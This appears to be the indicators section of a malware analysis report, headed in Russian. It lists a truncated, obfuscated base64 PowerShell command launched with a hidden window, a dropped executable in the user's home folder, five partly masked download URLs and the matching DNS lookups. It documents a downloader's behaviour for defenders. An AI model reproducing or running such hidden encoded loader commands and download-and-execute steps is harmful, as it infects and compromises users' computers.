Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AbwBjAGgAZwBlAGEAagB3AGkAagA9ACcAcwBvAGkAbgBjAGgAYQB2AGsAaQBvAHEAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAGkAVABZAHAAcgBPAH...
- %HOMEPATH%\783.exe
- %HOMEPATH%\783.exe
- http://he##eli.com/CtWE205/
- http://he###xcomic.com/cgi-bin/LogU/
- http://sh#####dfellowship.org/wp-content/jl21/
- http://co###a.online/sys-cache/bHYl6515/
- http://fr#####slavictoria.com/dbi/8Y2492/kCXg637791/
- DNS ASK he##eli.com
- DNS ASK he###xcomic.com
- DNS ASK sh#####dfellowship.org
- DNS ASK co###a.online
- DNS ASK fr#####slavictoria.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AbwBjAGgAZwBlAGEAagB3AGkAagA9ACcAcwBvAGkAbgBjAGgAYQB2AGsAaQBvAHEAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAGkAVABZAHAAcgBPAH...' (со скрытым окном)